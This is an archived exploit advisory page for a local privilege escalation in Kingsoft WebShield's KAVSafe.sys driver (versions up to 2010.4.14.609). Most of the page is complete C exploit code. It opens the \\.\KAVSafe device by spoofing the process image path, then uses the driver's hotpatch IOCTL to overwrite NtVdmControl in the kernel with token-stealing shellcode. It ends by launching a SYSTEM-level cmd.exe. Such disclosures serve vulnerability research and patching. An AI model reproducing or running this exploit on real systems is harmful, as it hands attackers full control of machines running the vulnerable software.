AOH :: HP Unsorted K :: B1A-1120.HTM

Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Priv Escalation



Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability



=0D
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability=0D
=0D
VULNERABLE PRODUCTS =0D
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)=0D
=0D
Signature Date: 2010-5-23 2:33:54=0D
=0D
And=0D
=0D
KAVSafe.sys <= 2010.4.14.609=0D
Signature Date:2010-4-14 13:42:26=0D
=0D
DETAILS:=0D
Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data=0D
=0D
EXPLOIT CODE:=0D
=0D
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)=0D
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(=0D
						  HANDLE ProcessHandle,=0D
						  DWORD ProcessInformationClass,=0D
						  PVOID ProcessInformation,=0D
						  ULONG ProcessInformationLength,=0D
						  PULONG ReturnLength=0D
    );=0D
=0D
typedef struct _STRING {=0D
    USHORT Length;=0D
    USHORT MaximumLength;=0D
    PCHAR Buffer;=0D
} STRING;=0D
typedef STRING *PSTRING;=0D
typedef struct _RTL_DRIVE_LETTER_CURDIR {=0D
    USHORT Flags;=0D
    USHORT Length;=0D
    ULONG TimeStamp;=0D
    STRING DosPath;=0D
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;=0D
typedef struct _UNICODE_STRING {=0D
    USHORT Length;=0D
    USHORT MaximumLength;=0D
    PWSTR  Buffer;=0D
} UNICODE_STRING;=0D
typedef UNICODE_STRING *PUNICODE_STRING;=0D
typedef const UNICODE_STRING *PCUNICODE_STRING;=0D
#define RTL_MAX_DRIVE_LETTERS 32=0D
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001=0D
typedef struct _CURDIR {=0D
    UNICODE_STRING DosPath;=0D
    HANDLE Handle;=0D
} CURDIR, *PCURDIR;=0D
typedef struct _RTL_USER_PROCESS_PARAMETERS {=0D
    ULONG MaximumLength;=0D
    ULONG Length;=0D
	=0D
    ULONG Flags;=0D
    ULONG DebugFlags;=0D
	=0D
    HANDLE ConsoleHandle;=0D
    ULONG  ConsoleFlags;=0D
    HANDLE StandardInput;=0D
    HANDLE StandardOutput;=0D
    HANDLE StandardError;=0D
	=0D
    CURDIR CurrentDirectory;        // ProcessParameters=0D
    UNICODE_STRING DllPath;         // ProcessParameters=0D
    UNICODE_STRING ImagePathName;   // ProcessParameters=0D
    UNICODE_STRING CommandLine;     // ProcessParameters=0D
    PVOID Environment;              // NtAllocateVirtualMemory=0D
	=0D
    ULONG StartingX;=0D
    ULONG StartingY;=0D
    ULONG CountX;=0D
    ULONG CountY;=0D
    ULONG CountCharsX;=0D
    ULONG CountCharsY;=0D
    ULONG FillAttribute;=0D
	=0D
    ULONG WindowFlags;=0D
    ULONG ShowWindowFlags;=0D
    UNICODE_STRING WindowTitle;     // ProcessParameters=0D
    UNICODE_STRING DesktopInfo;     // ProcessParameters=0D
    UNICODE_STRING ShellInfo;       // ProcessParameters=0D
    UNICODE_STRING RuntimeData;     // ProcessParameters=0D
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];=0D
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;=0D
typedef struct _PEB {=0D
    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the=0D
    BOOLEAN ReadImageFileExecOptions;   //=0D
    BOOLEAN BeingDebugged;              //=0D
    BOOLEAN SpareBool;                  //=0D
    HANDLE Mutant;                      // INITIAL_PEB structure is also updated.=0D
	=0D
    PVOID ImageBaseAddress;=0D
    PVOID Ldr;=0D
    struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;=0D
} PEB, *PPEB;=0D
typedef LONG KPRIORITY;=0D
typedef struct _PROCESS_BASIC_INFORMATION {=0D
    LONG ExitStatus;=0D
    PVOID PebBaseAddress;=0D
    ULONG_PTR AffinityMask;=0D
    KPRIORITY BasePriority;=0D
    ULONG_PTR UniqueProcessId;=0D
    ULONG_PTR InheritedFromUniqueProcessId;=0D
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;=0D
typedef struct {=0D
    ULONG   Unknown1;=0D
    ULONG   Unknown2;=0D
    PVOID   Base;=0D
    ULONG   Size;=0D
    ULONG   Flags;=0D
    USHORT  Index;=0D
    USHORT  NameLength;=0D
    USHORT  LoadCount;=0D
    USHORT  PathLength;=0D
    CHAR    ImageName[256];=0D
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;=0D
=0D
typedef struct {=0D
    ULONG   Count;=0D
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];=0D
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;=0D
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (=0D
						   LONG SystemInformationClass,=0D
						 PVOID SystemInformation,=0D
						   ULONG SystemInformationLength,=0D
						   PULONG ReturnLength=0D
    );=0D
=0D
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )=0D
typedef LONG (WINAPI *PNT_VDM_CONTROL) (=0D
			   ULONG Service,=0D
			   PVOID ServiceData=0D
    );=0D
VOID __declspec(naked) R0ShellCodeXP()=0D
{=0D
	__asm=0D
	{=0D
		mov eax,0xffdff124=0D
		mov eax,[eax]=0D
		mov esi ,dword ptr[eax+0x220]=0D
		mov eax,esi=0D
searchxp:=0D
		mov eax,dword ptr[eax+0x88]=0D
		sub eax,0x88=0D
		mov edx,dword ptr[eax+0x84]=0D
		cmp edx,4=0D
		jnz searchxp=0D
		mov eax,dword ptr[eax+0xc8]=0D
		mov dword ptr[esi + 0xc8] , eax=0D
		ret 8 =0D
	}=0D
}=0D
VOID NopNop()=0D
{=0D
	printf("nop!\n");=0D
}=0D
=0D
#include "malloc.h"=0D
int main(int argc, char* argv[])=0D
{=0D
=0D
	printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"=0D
		"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"=0D
		"2010-5-23\n"=0D
		"By Lincoin \n\nPress Enter");=0D
	HKEY hkey ; =0D
	WCHAR InstallPath[MAX_PATH];=0D
	DWORD datatype ; =0D
	DWORD datasize = MAX_PATH * sizeof(WCHAR);=0D
	ULONG oldlen ;=0D
	PVOID pOldBufferData = NULL ; =0D
=0D
	if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)=0D
	{=0D
		if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)=0D
		{=0D
			RegCloseKey(hkey);=0D
			printf("KSWebShield not installed\n");=0D
			getchar();=0D
			return 0 ;=0D
		}=0D
=0D
		RegCloseKey(hkey);=0D
	}=0D
	else=0D
	{=0D
		printf("KSWebShield not installed\n");=0D
		getchar();=0D
		return 0 ;=0D
	}=0D
	wcscat(InstallPath , L"\\kavinst.exe");=0D
=0D
=0D
	PROCESS_BASIC_INFORMATION pbi ; =0D
=0D
	PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;=0D
	=0D
	pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");=0D
	=0D
	pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);=0D
=0D
	PPEB peb ; =0D
=0D
	peb = (PPEB)pbi.PebBaseAddress;=0D
	oldlen = peb->ProcessParameters->ImagePathName.Length;=0D
	peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);=0D
	pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);=0D
	RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);=0D
	RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );=0D
	HANDLE hdev = CreateFile("\\\\.\\KAVSafe" , =0D
		FILE_READ_ATTRIBUTES , =0D
		FILE_SHARE_READ , =0D
		0,=0D
		OPEN_EXISTING , =0D
		0,=0D
		0);=0D
=0D
	if (hdev==INVALID_HANDLE_VALUE)=0D
	{=0D
		printf("cannot open device %u\n", GetLastError());=0D
		getchar();=0D
		return 0 ; =0D
	}=0D
	RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);=0D
	peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ; =0D
	=0D
=0D
	PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation  ;=0D
	pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");=0D
	X_SYSTEM_MODULE_INFORMATION sysmod ; =0D
	HMODULE KernelHandle ; =0D
=0D
	pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);=0D
	=0D
    KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);=0D
	=0D
	if (KernelHandle == 0 )=0D
	{=0D
		printf("cannot load ntoskrnl!\n");=0D
		getchar();=0D
		return 0 ; =0D
	}=0D
	PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");=0D
=0D
	if (pNtVdmControl == 0 )=0D
	{=0D
		printf("cannot find NtVdmControl!\n");=0D
		getchar();=0D
		return 0 ; 		=0D
	}=0D
	pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle  );=0D
=0D
	printf("NtVdmControl = %08x" , pNtVdmControl );=0D
	=0D
	getchar();=0D
	ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;=0D
	ULONG pShellCode = (ULONG)R0ShellCodeXP; =0D
=0D
=0D
	PVOID Data = malloc(0x48 + ShellCodeSize);=0D
=0D
	CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);=0D
	=0D
	=0D
	=0D
	CHAR ModuleName[68]= "ntoskrnl.exe" ; =0D
	RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));=0D
	*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;=0D
	*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;=0D
	=0D
	ULONG btr ; =0D
	if (!DeviceIoControl(hdev ,=0D
		IOCTL_HOTPATCH_KERNEL_MODULE , =0D
		Data , =0D
		0x48 + ShellCodeSize , =0D
		NULL , =0D
		0,=0D
		&btr , 0 =0D
		))=0D
	{=0D
		printf("cannot device io control!%u\n" , GetLastError());=0D
		getchar();=0D
		return 0;=0D
	}=0D
=0D
	CloseHandle(hdev);=0D
=0D
	PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");=0D
	pR3NtVdmControl(0,0);=0D
	=0D
	WinExec("cmd.exe" , SW_SHOW);=0D
	printf("OK!\n ");=0D
=0D
	getchar();=0D
=0D
	return 0; =0D
}=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.